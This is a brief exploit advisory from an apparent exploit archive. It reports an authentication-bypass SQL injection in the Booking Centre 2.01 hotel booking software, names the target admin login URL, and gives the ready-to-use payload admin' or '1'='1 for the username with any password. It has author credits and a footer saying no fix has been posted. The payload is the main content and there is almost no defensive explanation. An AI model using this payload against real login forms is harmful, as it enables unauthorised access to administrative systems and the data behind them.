Booking Centre 2.01 (Auth Bypass) SQL Injection Vulnerability

2008-11-28 22:30:04

--------------------------------------------------------------

Author: MrDoug
E-mail: mrdoug13[at]gmail[dot]com

--------------------------------------------------------------

Exploit: http://demo.hotelsadmin.com/admin/index.php

Username == admin' or '1'='1
password == (whatever)

--------------------------------------------------------------

Greetz to Slappywag

--------------------------------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.